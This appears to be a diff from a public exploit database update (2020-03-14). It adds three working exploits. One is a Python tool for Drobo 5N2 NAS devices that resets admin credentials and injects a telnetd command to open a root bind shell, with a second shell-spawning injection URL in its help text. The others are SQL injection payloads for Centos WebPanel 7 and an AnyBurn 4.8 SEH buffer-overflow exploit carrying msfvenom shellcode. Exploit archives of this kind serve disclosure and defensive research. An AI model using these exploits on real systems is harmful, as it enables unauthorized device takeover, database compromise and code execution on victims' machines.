DB: 2020-03-14

4 changes to exploits/shellcodes

AnyBurn 4.8 - Buffer Overflow (SEH)

Drobo 5N2 4.1.1 - Remote Command Injection

Centos WebPanel 7 - 'term' SQL Injection

exploits/hardware/remote/48214.py

@@ -0,0 +1,247 @@
+# Exploit Title: Drobo 5N2 4.1.1 - Remote Command Injection
+# Date: 2020-03-12
+# Exploit Author: Rick Ramgattie, Ian Sindermann
+# Vendor Homepage: https://www.drobo.com/
+# Version: 4.1.1 and lower.
+# CVE: CVE-2018-14709, CVE-2018-14701
+###
+
+#!/usr/bin/env python3
+
+# nasty.py - A proof-of-concept utility for (maliciously) interacting with the Drobo NASd service.
+# This utility leverages the lack of any real authentication mechanism to perform arbitrary actions.
+# These actions include:
+# - Getting device status.
+# - Installing applications.
+# - Resetting admin credentials.
+# - Popping root shells.
+# - Turning on party mode.
+# This set of exploits is known to affect the Drobo 5N2, firmware version 4.1.1 and lower.
+# As of 2020-03-12, newer firmware versions appear to be vulnerable as well, but this has not been verified.
+# Most of the Drobo product line also appears to be vulnerable. Again, this has not been verified.
+# These vulnerabilities were disclosed to the manufacturer on 2018-07-10.
+# More vulnerabilities for this device may be found here: https://blog.securityevaluators.com/4f1d885df7fc
+###
+# Product of ISE Labs.
+# - http://www.securityevaluators.com/
+# - @ISESecurity
+###
+
+
+# RE Notes:
+#                                 ,-- Encryption bool?
+# Handshake Preamble:       *    /\
+# 44 52 49 4e 45 54 54 4d  07 01 00 00 00 00 00 88
+# \_____________________/  \_________/ \_________/
+#  Static string.           To/from     Size of
+#  "DIRNETTM"               server?     next message
+#
+# Handshake
+# 64 72 61 31 37 33 32 30  32 33 30 30 30 31 30 00  00 00 00 00 64 72 61 31  37 33 32 30 32 33 30 30  30 31 30 00 00 00 00 00  00 00...
+# \______________________________________________/  \_________/ \_______________________________________________/ \_________________-->
+#  Device serial number with NULL padding.           NULL        Device serial number with NULL padding. ESAID?    88 bytes of NULL
+#  "dra173202300010"                                             "dra173202300010"
+#
+# The stat port returns an "ESAID" value that is identical to the serial number on this device (5N2).
+# One of the serial numbers in this packet may actually be the ESAID.
+#
+# Preamble:                 *
+# 44 52 49 4e 45 54 54 4d  0a 01 00 00 00 00 00 88
+# \_____________________/  \_________/ \_________/
+#  Static string.           To/from     Size of
+#  "DIRNETTM"               server?     next message
+#
+# Message:
+# XX XX XX XX XX XX XX XX  00
+# \_____________________/  \/
+# Arbitrary length string  NULL terminator
+#
+#
+# Protocol flow:
+#   Initial handshake:         ,----- 2nd nibble in 3rd section is different. "07 01 00 00" instead of "0a 01 00 00" #TODO: why?
+#   |  c -> s: Preamble.    <-'    \_
+#   |  c -> s: Message: Handshake  / `- These two are normally sent as one packet.
+#   v  c <- s: Preamble.    <-------- 2nd nibble in 3rd section is different. "87 01 00 00" instead of "8a 01 00 00" #TODO: why?
+#   Loop:
+#   +> c -> s: Preamble.
+#   |  c -> s: Message: Command.
+#   |  c <- s: Preamble.
+#   +- c <- s: Message: Results.  > Large responses are split into chunks. Must use size from preamble.
+
+
+import argparse
+import logging
+import re
+import socket
+import struct
+import sys
+
+
+LOG_FORMAT = '[%(levelname)s]: %(message)s'
+BUFFER_SIZE = 1024
+HANDSHAKE_PREAMBLE = b'\x44\x52\x49\x4e\x45\x54\x54\x4d\x07\x01\x00\x00'
+PREAMBLE           = b'\x44\x52\x49\x4e\x45\x54\x54\x4d\x0a\x01\x00\x00'
+PREAMBLE_LEN = 16
+
+# Note: Payloads usually contain the device's serial number. Replace this with
+# '{serial}' so `send_msg` can insert the target's serial.
+PAYLOADS = {
+    "daccess" :'<TMCmd><CmdID>78</CmdID><Params><Name>DroboAccess</Name><Action>Install</Action><Data>ftp://updates.drobo.com/droboapps/2.1/downloads/DroboAccess.tgz</Data></Params><ESAID>{serial}</ESAID></TMCmd>',
+    "dropbear":'<TMCmd><CmdID>78</CmdID><Params><Name>dropbear</Name><Action>Install</Action><Data>ftp://updates.drobo.com/droboapps/2.1/downloads/dropbear.tgz</Data></Params><ESAID>{serial}</ESAID></TMCmd>',
+    "getadmin":'<TMCmd><CmdID>30</CmdID><Params><DRINasAdminConfig>DRINasAdminConfig</DRINasAdminConfig><DRINasDroboAppsConfig>DRINasDroboAppsConfig</DRINasDroboAppsConfig></Params><ESAID>{serial}</ESAID></TMCmd>',
+    "getnet"  :'<TMCmd><CmdID>30</CmdID><ESAID>{serial}</ESAID><Params><Network>Network</Network></Params></TMCmd>',
+    "gettemp" :'<TMCmd><CmdID>61</CmdID><ESAID>{serial}</ESAID></TMCmd>',
+    "partyon" :'<TMCmd><CmdID>26</CmdID><Params><IdentifyInterval>900</IdentifyInterval></Params><ESAID>{serial}</ESAID></TMCmd>',
+    "partyoff":'<TMCmd><CmdID>26</CmdID><Params><IdentifyInterval>0</IdentifyInterval></Params><ESAID>{serial}</ESAID></TMCmd>',
+    "popit"   :'<TMCmd><CmdID>78</CmdID><Params><Name>Drobo`telnetd -l $SHELL -p 8383`Access</Name><Action>Install</Action><Data>bork</Data></Params><ESAID>{serial}</ESAID></TMCmd>',
+    "restart" :'<TMCmd><CmdID>21</CmdID><ESAID>{serial}</ESAID></TMCmd>',
+    "setadmin":'<TMCmd><CmdID>31</CmdID><Params><DRINASConfig><DRINasAdminConfig><UserName>admin</UserName><Password>ono</Password><ValidPassword>1</ValidPassword><EncryptedPassword>0</EncryptedPassword></DRINasAdminConfig><DRINasDroboAppsConfig><Version>11</Version><Enabled>1</Enabled></DRINasDroboAppsConfig></DRINASConfig></Params><ESAID>{serial}</ESAID></TMCmd>',
+    "test"    :'<TMCmd><CmdID>82</CmdID><Params><Time>1521161215</Time><GMTOffset>4294966876</GMTOffset></Params><ESAID>{serial}</ESAID></TMCmd>',
+    "stdin"   :'Handled elsewhere.'}
+
+DEFAULT_PORT_STAT = 5000
+DEFAULT_PORT_CMD = 5001
+DEFAULT_TIMEOUT = None
+HELP_EPILOG='''
+PAYLOADS
+  daccess  - Installs DroboAccess on the target device. At the time of writing,
+             DroboAccess has numerous unauthenticated command injection
+             vulnerabilities. Try the following:
+             GET /DroboAccess/delete_user?username=test';/usr/sbin/telnetd -l /bin/sh -p 8383
+             - A long delay and response of "<Error>0</Error>" is expected.
+  dropbear - Installs dropbear on the target device.
+             - A response of "<Error>0</Error>" is expected.
+  getadmin - Returns the target's current (redacted) admin configuration.
+  gettemp  - Returns the target's system info (temperature and uptime).
+  getnet   - Returns the target's network info.
+  partyon  - Enables "party mode" on the target. This will cause the target
+             device's lights to blink for 15 minutes.
+  partyoff - Prematurely disables "party mode".
+  popit    - Exploits CVE-2019-6801 to spawn a root bind shell on port 8383.
+             - A response of "<Error>1</Error>" is expected.
+  restart  - Restarts the target device.
+  setadmin - Sets administrative options on the target.
+             - Username: admin
+             - Password: ono
+             - Apps enabled: yes
+  stdin    - Reads data from STDIN and sends it as a command.
+'''
+
+
+def recv_message(s):
+    preamble = s.recv(PREAMBLE_LEN)
+    msg_len = struct.unpack(">I", preamble[-4:])[0] # Parse expected message length from preamble.
+    message = ''
+    if msg_len <= 0:
+        return(message)
+    while True:
+        message += s.recv(BUFFER_SIZE).decode('utf-8')
+        if len(message) >= msg_len:
+            return(message) # There will be a null at the end. It should be fine.
+
+
+def send_handshake(s, serial):
+    serial_bytes = serial.encode('utf-8')
+    hs_body  = struct.pack("16s", serial_bytes) # 16 byte padded string containing device serial number.
+    hs_body += struct.pack(">I", 0) # 4 byte field, presumably uint, only seen as zero.
+    hs_body += struct.pack("16s", serial_bytes) # 16 byte padded string containing device serial number. again...
+    hs_body += struct.pack("184x") # 184 bytes of NULL padding.
+    size_bytes = struct.pack(">I", len(hs_body)) # Size of message body. Send with preamble.
+    hs_data = HANDSHAKE_PREAMBLE + size_bytes + hs_body
+    logging.debug(repr(hs_data))
+    s.send(hs_data)
+
+
+def send_message(s, serial, message):
+    msg_body = message.format(serial=serial) # Add target device's serial number.
+    msg_body_bytes = msg_body.encode('utf-8')
+    msg_body_bytes += struct.pack("x") # NULL terminator.
+    size_bytes = struct.pack(">I", len(msg_body_bytes)) # Size of XML body. Send with preamble.
+    msg_data = PREAMBLE + size_bytes + msg_body_bytes
+    logging.debug(repr(msg_data))
+    s.send(msg_data)
+
+
+aparser = argparse.ArgumentParser(
+        description='nasty.py - A proof-of-concept utility for (maliciously) interacting with the Drobo NASd service.',
+        epilog=HELP_EPILOG,
+        formatter_class=argparse.RawDescriptionHelpFormatter)
+aparser.add_argument("host", help='Host or IP address of the target Drobo.')
+aparser.add_argument("payload", help='Payload to use. See PAYLOADS.')
+aparser.add_argument("-p", "--portstat", help='Specify a non-default stat port on the Drobo.', default=DEFAULT_PORT_STAT, type=int)
+aparser.add_argument("-P", "--portcmd", help='Specify a non-default command port on the Drobo.', default=DEFAULT_PORT_CMD, type=int)
+aparser.add_argument("-s", "--serial", help='Manually set the target serial number. Skips serial number detection.')
+aparser.add_argument("-t", "--timeout", help='Set a timeout in seconds for socket operations.', default=DEFAULT_TIMEOUT, type=float)
+aparser.add_argument("-v", "--verbose", help='Increase verbosity.', action='store_true')
+args = aparser.parse_args()
+
+# Basic check for color support.
+if sys.stdout.isatty() and sys.platform in ["linux","linux2","darwin"]:
+    logging.addLevelName(logging.NOTSET,   "\033[39m????\033[0m")
+    logging.addLevelName(logging.DEBUG,    "\033[37mDBUG\033[0m")
+    logging.addLevelName(logging.INFO,     "\033[96mINFO\033[0m")
+    logging.addLevelName(logging.WARNING,  "\033[93mWARN\033[0m")
+    logging.addLevelName(logging.ERROR,    "\033[95mERRR\033[0m")
+    logging.addLevelName(logging.CRITICAL, "\033[91mCRIT\033[0m")
+else: 
+    logging.addLevelName(logging.NOTSET,   "????")
+    logging.addLevelName(logging.DEBUG,    "DBUG")
+    logging.addLevelName(logging.INFO,     "INFO")
+    logging.addLevelName(logging.WARNING,  "WARN")
+    logging.addLevelName(logging.ERROR,    "ERRR")
+    logging.addLevelName(logging.CRITICAL, "CRIT")
+
+if args.verbose:
+    logging.basicConfig(format=LOG_FORMAT, level=logging.DEBUG)
+else:
+    logging.basicConfig(format=LOG_FORMAT, level=logging.INFO)
+
+if args.payload == 'stdin':
+    logging.info("Reading payload from STDIN.")
+    payload_xml = sys.stdin.read()
+    logging.debug(payload_xml)
+else:
+    payload_xml = PAYLOADS[args.payload]
+
+
+logging.info("Connecting...")
+# Connect to the stat port. This is required for the cmd port to work.
+# The stat port also gives us the serial number.
+sock_stat = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+sock_stat.settimeout(args.timeout)
+sock_stat.connect((args.host, args.portstat))
+# Connect to the cmd port.
+sock_cmd = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+sock_cmd.settimeout(args.timeout)
+sock_cmd.connect((args.host, args.portcmd))
+
+# Pull the serial number from the stat port.
+logging.info("Pulling serial number...")
+stat_msg = sock_stat.recv(BUFFER_SIZE)
+if args.serial:
+    serial = args.serial
+else:
+    m = re.search('<mSerial>([^<]+)</mSerial>', stat_msg.decode('utf-8'))
+    if not m:
+        logging.critical("Could not determine target's serial number!")
+        logging.debug(stat_msg)
+        sys.exit(100)
+    serial = m.group(1)
+    logging.info("Identified serial: " + serial)
+
+# Perform a handshake with the cmd port. Requires the serial num.
+logging.info('Performing handshake...')
+send_handshake(sock_cmd, serial)
+recv_message(sock_cmd) # Blank response - trash.
+
+# Send the payload.
+logging.info("Sending payload...")
+send_message(sock_cmd, serial, payload_xml)
+logging.info("Waiting for response...")
+resp = recv_message(sock_cmd)
+logging.info("Response:\n" + resp)
+
+# Cleanup.
+sock_cmd.close()
+sock_stat.close()
+logging.info("Donezo.")

exploits/linux/webapps/48212.txt

@@ -0,0 +1,28 @@
+# Exploit Title: Centos WebPanel 7 - 'term' SQL Injection
+# Google Dork: N/A
+# Date: 2020-03-03
+# Exploit Author: Berke YILMAZ
+# Vendor Homepage: http://centos-webpanel.com/
+# Software Link: http://centos-webpanel.com/
+# Version: v6 - v7
+# Tested on: Kali Linux - Windows 10
+# CVE : N/A
+
+# Type: Error Based SQL Injection
+# Payload:
+https://{DOMAIN_NAME}:2031/cwp_{SESSION_HASH}/admin/loader_ajax.php?ajax=dashboard&action=searchIn&term=a'
+AND (SELECT 1197 FROM(SELECT COUNT(*),CONCAT(0x716b6a7171,(SELECT
+(ELT(1197=1197,1))),0x71707a7671,FLOOR(RAND(0)*2))x FROM
+INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- aRuO
+
+
+# Type: Time Based SQL Injection
+# Payload:
+https://{DOMAIN_NAME}:2031/cwp_{SESSION_HASH}/admin/loader_ajax.php?ajax=dashboard&action=searchIn&term=a'
+OR SLEEP(5)-- JCpP
+
+Centos-Webpanel (http://centos-webpanel.com/)
+CentOS Web Panel | Free Linux Web Hosting Control Panel
+Free CentOS Linux Web Hosting control panel designed for quick and easy
+management of (Dedicated & VPS) servers without of need to use ssh console
+for every little thing

exploits/windows/local/40863.txt

@@ -6,6 +6,7 @@
 
 [+] ISR: ApparitionSec
 
+[+] CVE: CVE-2019-0948
 
 
 Vendor:

exploits/windows/local/48211.py

@@ -0,0 +1,125 @@
+# Exploit Title: AnyBurn 4.8 - Buffer Overflow (SEH)
+# Date: 2020-03-09
+# Vendor Homepage: http://www.anyburn.com/
+# Software Link : http://www.anyburn.com/anyburn_setup.exe
+# Exploit Authors: "Richard Davy/Gary Nield"
+# Tested Version: 4.8 (32-bit)
+# Tested on: Windows 10 Enterprise x64
+# Vulnerability Type: Buffer Overflow/SEH/Unicode
+
+# Steps to Produce the Exploit:
+# 1.- Run python code
+# 2.- Open payload.txt and copy content to clipboard
+# 3.- Open AnyBurn choose 'Copy disk to image file'
+# 4.- Paste the content of payload.txt into the field: 'Select image file name'
+# 5.- Click 'Create Now' and you will see a crash and the payload launch.
+
+#!/usr/bin/env python
+
+#Set overall payload size
+crash_buffer_size = 10000
+#nseh offset for SEH overwrite
+nseh_offset = 9197
+
+#location in payload where stack alignment returns to for payload
+payloadret = 4459	
+#payload filler
+junk = "\x71" * payloadret 
+
+#Payload generated via msfvenom, easily changeable as padding is auto calculated
+#msfvenom -a x86 -p windows/exec cmd=calc.exe -e x86/unicode_upper BufferRegister=EAX -f py
+buf =  b""
+buf += b"\x50\x50\x59\x41\x49\x41\x49\x41\x49\x41\x49\x41\x51"
+buf += b"\x41\x54\x41\x58\x41\x5a\x41\x50\x55\x33\x51\x41\x44"
+buf += b"\x41\x5a\x41\x42\x41\x52\x41\x4c\x41\x59\x41\x49\x41"
+buf += b"\x51\x41\x49\x41\x51\x41\x50\x41\x35\x41\x41\x41\x50"
+buf += b"\x41\x5a\x31\x41\x49\x31\x41\x49\x41\x49\x41\x4a\x31"
+buf += b"\x31\x41\x49\x41\x49\x41\x58\x41\x35\x38\x41\x41\x50"
+buf += b"\x41\x5a\x41\x42\x41\x42\x51\x49\x31\x41\x49\x51\x49"
+buf += b"\x41\x49\x51\x49\x31\x31\x31\x31\x41\x49\x41\x4a\x51"
+buf += b"\x49\x31\x41\x59\x41\x5a\x42\x41\x42\x41\x42\x41\x42"
+buf += b"\x41\x42\x33\x30\x41\x50\x42\x39\x34\x34\x4a\x42\x4b"
+buf += b"\x4c\x5a\x48\x44\x42\x4d\x30\x4b\x50\x4b\x50\x43\x30"
+buf += b"\x44\x49\x49\x55\x50\x31\x49\x30\x43\x34\x54\x4b\x50"
+buf += b"\x50\x50\x30\x44\x4b\x42\x32\x4c\x4c\x54\x4b\x42\x32"
+buf += b"\x4c\x54\x34\x4b\x43\x42\x4d\x58\x4c\x4f\x46\x57\x4f"
+buf += b"\x5a\x4d\x56\x30\x31\x4b\x4f\x56\x4c\x4f\x4c\x33\x31"
+buf += b"\x43\x4c\x4c\x42\x4e\x4c\x4f\x30\x49\x31\x48\x4f\x4c"
+buf += b"\x4d\x4d\x31\x49\x37\x5a\x42\x4c\x32\x50\x52\x50\x57"
+buf += b"\x44\x4b\x30\x52\x4c\x50\x34\x4b\x50\x4a\x4f\x4c\x54"
+buf += b"\x4b\x50\x4c\x4c\x51\x54\x38\x5a\x43\x31\x38\x4b\x51"
+buf += b"\x48\x51\x32\x31\x44\x4b\x42\x39\x4d\x50\x4b\x51\x59"
+buf += b"\x43\x54\x4b\x51\x39\x4d\x48\x4b\x33\x4f\x4a\x4f\x59"
+buf += b"\x44\x4b\x30\x34\x44\x4b\x4d\x31\x5a\x36\x30\x31\x4b"
+buf += b"\x4f\x56\x4c\x57\x51\x58\x4f\x4c\x4d\x4b\x51\x39\x37"
+buf += b"\x4f\x48\x39\x50\x34\x35\x4b\x46\x4d\x33\x33\x4d\x4b"
+buf += b"\x48\x4f\x4b\x33\x4d\x4f\x34\x43\x45\x4b\x34\x42\x38"
+buf += b"\x44\x4b\x51\x48\x4e\x44\x4b\x51\x59\x43\x31\x56\x54"
+buf += b"\x4b\x4c\x4c\x30\x4b\x44\x4b\x50\x58\x4d\x4c\x4d\x31"
+buf += b"\x38\x53\x34\x4b\x4b\x54\x44\x4b\x4d\x31\x5a\x30\x53"
+buf += b"\x59\x51\x34\x4e\x44\x4d\x54\x51\x4b\x31\x4b\x43\x31"
+buf += b"\x52\x39\x51\x4a\x30\x51\x4b\x4f\x49\x50\x51\x4f\x51"
+buf += b"\x4f\x30\x5a\x34\x4b\x4c\x52\x4a\x4b\x34\x4d\x51\x4d"
+buf += b"\x31\x5a\x4b\x51\x34\x4d\x35\x35\x46\x52\x4b\x50\x4d"
+buf += b"\x30\x4b\x50\x30\x50\x51\x58\x4e\x51\x44\x4b\x42\x4f"
+buf += b"\x33\x57\x4b\x4f\x59\x45\x47\x4b\x5a\x50\x38\x35\x36"
+buf += b"\x42\x32\x36\x52\x48\x37\x36\x45\x45\x47\x4d\x45\x4d"
+buf += b"\x4b\x4f\x48\x55\x4f\x4c\x4d\x36\x53\x4c\x4c\x4a\x35"
+buf += b"\x30\x4b\x4b\x39\x50\x42\x55\x4c\x45\x57\x4b\x4f\x57"
+buf += b"\x4d\x43\x52\x52\x32\x4f\x42\x4a\x4d\x30\x42\x33\x4b"
+buf += b"\x4f\x4a\x35\x32\x43\x51\x51\x42\x4c\x52\x43\x4e\x4e"
+buf += b"\x53\x35\x42\x58\x52\x45\x4d\x30\x41\x41"
+
+#Filler padding after payload code to bring us to nseh offset
+#auto calculated in case payload size changes
+junk1 = "\x71" * int(nseh_offset-(len(junk)+len(buf)))
+
+#SEH Overwrite
+nSeh = "\x61\x70"
+#Unicode safe SEH return
+seh = "\x09\x48"
+
+#Stack realignment which takes us directly back into shellcode
+eax_align =  "\x70\x71\x71\x71" 	 	
+eax_align += "\x54" 					
+eax_align += "\x47" 					
+eax_align += "\x58"						
+eax_align += "\x47" 					
+eax_align += "\x05\x2F\x11" 			
+eax_align += "\x47" 					
+eax_align += "\x2d\x01\x11" 			
+eax_align += "\x47" 					
+eax_align += "\x50" 					
+eax_align += "\x47"						
+eax_align += "\xc3"						
+
+#Padding to take us to 10,000 
+padding = "\x71" * int(crash_buffer_size-(len(junk)+len(buf)+len(junk1)+len(nSeh)+len(seh)+len(eax_align)))
+
+#Assembly of parts 
+buffer=junk+buf+junk1+nSeh+seh+eax_align+padding
+
+try:
+	f=open("payload.txt","w")
+	print "\nAnyBurn Version 4.8 (32-bit) Exploit\n"
+	print "Software Link : http://www.anyburn.com/anyburn_setup.exe"
+	print "Exploit Authors: Richard Davy/Gary Nield"
+	print "Tested on: Windows 10 Enterprise x64"
+	print "Vulnerability Type: Buffer Overflow/SEH/Unicode\n"
+
+	print "Steps to Produce the Exploit:"
+	print "1.- Run python code"
+	print "2.- Open payload.txt and copy content to clipboard"
+	print "3.- Open AnyBurn choose 'Copy disk to image file'"
+	print "4.- Paste the content of payload.txt into the field: 'Select image file name'"
+	print "5.- Click 'Create Now' and you will see a crash and the payload launch.\n"
+
+	print "[+] Creating %s bytes evil payload " %len(buffer)
+	
+	f.write(buffer)
+	f.close()
+
+	print "[+] File payload.txt created..."
+
+except:
+	print "[!] File cannot be created..."

files_exploits.csv

@@ -10989,6 +10989,7 @@ id,file,description,date,author,type,platform,port
 48187,exploits/multiple/local/48187.txt,"Counter Strike: GO - '.bsp' Memory Control (PoC)",2020-03-09,"0day enthusiast",local,multiple,
 48193,exploits/windows/local/48193.txt,"ASUS AXSP 1.02.00 - 'asComSvc' Unquoted Service Path",2020-03-11,"Roberto Piña",local,windows,
 48206,exploits/windows/local/48206.txt,"ASUS AAHM 1.00.22 - 'asHmComSvc' Unquoted Service Path",2020-03-12,"Roberto Piña",local,windows,
+48211,exploits/windows/local/48211.py,"AnyBurn 4.8 - Buffer Overflow (SEH)",2020-03-13,"Richard Davy",local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -18041,6 +18042,7 @@ id,file,description,date,author,type,platform,port
 48186,exploits/multiple/remote/48186.rb,"Google Chrome 80 - JSCreate Side-effect Type Confusion (Metasploit)",2020-03-09,Metasploit,remote,multiple,
 48191,exploits/linux/remote/48191.rb,"Nagios XI - Authenticated Remote Command Execution (Metasploit)",2020-03-10,Metasploit,remote,linux,
 48192,exploits/php/remote/48192.rb,"PHPStudy - Backdoor Remote Code execution (Metasploit)",2020-03-10,Metasploit,remote,php,
+48214,exploits/hardware/remote/48214.py,"Drobo 5N2 4.1.1 - Remote Command Injection",2020-03-13,"Ian Sindermann",remote,hardware,
 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -42466,3 +42468,4 @@ id,file,description,date,author,type,platform,port
 48208,exploits/php/webapps/48208.py,"rConfig 3.9 - 'searchColumn' SQL Injection",2020-03-12,vikingfr,webapps,php,
 48209,exploits/php/webapps/48209.py,"Horde Groupware Webmail Edition 5.2.22 - PHP File Inclusion",2020-03-11,"Andrea Cardaci",webapps,php,
 48210,exploits/php/webapps/48210.py,"Horde Groupware Webmail Edition 5.2.22 - PHAR Loading",2020-03-11,"Andrea Cardaci",webapps,php,
+48212,exploits/linux/webapps/48212.txt,"Centos WebPanel 7 - 'term' SQL Injection",2020-03-13,"Berke YILMAZ",webapps,linux,